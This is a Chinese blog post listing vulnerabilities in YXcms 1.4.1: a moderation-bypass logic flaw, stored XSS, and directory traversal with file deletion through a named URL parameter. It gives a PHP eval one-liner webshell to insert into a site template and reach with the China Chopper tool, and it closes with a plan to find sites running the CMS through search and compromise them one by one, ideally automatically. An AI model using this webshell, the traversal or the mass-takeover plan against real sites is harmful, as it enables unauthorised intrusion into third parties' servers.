YXcms1.4.1漏洞总结

YXcms是一个相当不错的、基于PHP和Mysql的CMS系统,我给某单位做的官网就使用了这个CMS系统。用phithon的话来说,这个CMS系统的安全性是中上的。YXcms确实没有很幼稚的安全问题,但还是存在不少问题,总结如下。测试版本是1.4.1。

  1. 逻辑漏洞

    开放注册时,用户发布的资讯需要经过管理员审核才能发表。但一旦经过审核,用户再次修改资讯,便不再需要审核了。恶意用户可注册账号,先发布合法的资讯,通过审核后再修改为非法有害的。

  2. 存储型Xss漏洞

    • 用户发布的资讯中可嵌入JavaScript脚本,虽然会被过滤,但这个过滤是发生在前端的,有多种方法可绕过,如用Burp拦截修改资讯的数据包,让后修改资讯正文内容,插入JavaScript脚本。
    • 管理员在后台发布的资讯不做检查,可直接嵌入JavaScript脚本
    • 管理首页-网站配置 中 ICP备案号 等多个表单字段均存在Xss漏洞,无需变形,可直接利用
  3. 目录遍历-删除文件

    上传文件管理处存在目录遍历漏洞,修改:index.php?r=admin/files/index&dirget=%2Cextend 中dirget的值便可遍历服务器文件,可查看图片、.txt等文件内容,若有权限,还可删除文件。

  4. 进入管理后台后写入一句话木马的方式

    利用编辑前台模板的功能,打开一个前台模板,在其中插入一句话木马,如:

        <?php @eval($_POST[value]);?>
    

    然后找到使用这个模板的页面,在菜刀中输入这个页面的网址即可。每个页面都用到的模板是layout.php,但把木马插入到这个文件里被发现的概率也比较高。

  5. 批量拿站思路

    • 先下载某CMS源码,研究其漏洞,找到从拿后台权限到拿webshell的一系列漏洞
    • 再百度 Power by XXcms,找到使用该CMS的网站们
    • 逐个测试,是否有漏洞,若有则拿下
    • 最好能自动化

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

6 − 4 =